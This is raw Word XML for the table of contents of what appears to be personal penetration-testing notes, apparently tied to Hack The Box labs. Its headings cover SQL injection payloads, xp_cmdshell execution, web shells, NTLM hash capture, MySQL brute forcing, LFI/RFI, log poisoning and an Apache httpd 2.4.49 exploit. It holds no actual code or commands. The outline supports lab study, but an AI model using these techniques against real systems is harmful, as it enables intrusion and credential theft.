        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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cycbtq8w9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Helpful sections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">254</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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hlkgurambk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Manual Privilege Escalation</w:t>
              <w:tab/>
              <w:t xml:space="preserve">255</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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ipg2fsau8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netstat (to look at open ports)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">260</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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pdwj96pzkf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.bash_history</w:t>
              <w:tab/>
              <w:t xml:space="preserve">260</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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wx8275jufl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 -tulnp</w:t>
              <w:tab/>
              <w:t xml:space="preserve">261</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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hop5jxnjbf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pspy</w:t>
              <w:tab/>
              <w:t xml:space="preserve">263</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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h9m1fnbezl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Identifying SQLi via Error-based Payloads (for mysql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">265</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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nd2dwy2teb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UNION-based SQL Injection Payloads</w:t>
              <w:tab/>
              <w:t xml:space="preserve">267</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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bqwrktvis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Blind SQL Injections (opposite of in-band)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">273</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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wl998ganxw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test for SQL injection for Blind SQL injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">275</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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pf5ggrrt34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SQL authentication bypass (to get past login page)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">276</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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c7zo345unf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Manual Code Execution for SQL (SQL Injections)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">277</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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2iucmkox5j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Enabling command execution with xp_cmdshell through website (only works for mssql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">277</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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edofmw5i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Enabling command execution with xp_cmdshell through mssql client (only works for mssql)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">279</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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hj9cko0o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web shell through sql injection (through UNION-based payload)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">279</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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36pa5tkbh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web shell through sql injection (through command injection)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">281</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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bwm8wd1v0z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web shell with PostgreSQL (never tested)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">282</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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gimcc81yo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w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_rgimcc81yo0x">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">XXXXXXXXX</w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink w:anchor="_rgimcc81yo0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282</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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xpantnvkdfa">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Automated Code Execution (SQL Map) (SQL Injections)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">286</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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jz16feiyb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SQLMap and SQL injections</w:t>
              <w:tab/>
              <w:t xml:space="preserve">291</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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s1a6fa3ylf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Microsoft SQL Server (mssql) (ms-sql-s)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">297</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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q3vcr20l5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mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">298</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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hcz16acu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impersonate other users on mssql to access databases you don't have access to</w:t>
              <w:tab/>
              <w:t xml:space="preserve">301</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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5c9bw5vdd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nxc and mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">302</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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3swb7inbl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command execution in mssql after you are sysadmin</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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f9wy8cijj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run commands within mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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6epcsl8l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NTLM hash capture trick (using mssql xp_dirtree and responder)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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csxpe9y4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crack the NTLMv2 hash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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tzzd1oev67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Mysql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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vil5nfgi7e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tell if you need to pivot</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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gjna1lnk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reset passwords in MySQL table</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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czf9kr0ge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add row to MySQL table (useful for adding fake users to access a website)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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nl1ozj57w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Brute Forcing mysql:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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xf6d70ba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blocked due to automated bruteforce</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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mxd07t7aq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Manual Bruteforce:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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kcew8s3w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 User-Defined Function (UDF) priv esc for version ⅘</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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z0h2fued0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 commands</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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r5f4s0nzr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Postgresql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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xjy8echb6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Command execution from PostgreSQL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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1jq28ltbsw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from PostgreSQL</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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atb2cxre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1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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7tl24r61ao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MongoDB</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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mnkbcgjz8a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view .db files using sqlitebrowser (GUI)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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e2lfj23vxr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sqlite3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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oz7tx8s337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Dbeaver</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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gdjharludt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connect to mssql</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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reijkki752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S3 (Amazon Simple Storage Service)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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aievyyu2c4l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WinRM (Windows Remote Manager)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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vcram47f0kl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LFI and RFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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w38mpqcyc6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LFI vs. Directory Traversal</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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dnibm5l03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From Responder (Tier 2 Starting Point HTB)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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0zvdj3piq7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RFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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58l5jdwkfi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LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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e9ejkfgx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to do once you have LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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f9j5ppig5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Comprehensive LFI List</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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5o02y40xbt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LFI Tricks</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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jdh9t8iq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Bypassing PHP Assertions</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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m9gxdaxyi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Encoding Special Characters (and Apache httpd 2.4.49 exploit)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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r61fk3r1e6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Log Poisoning via LFI</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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ockyiwfpd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auth.log</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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1ona1s0h72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access.log</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
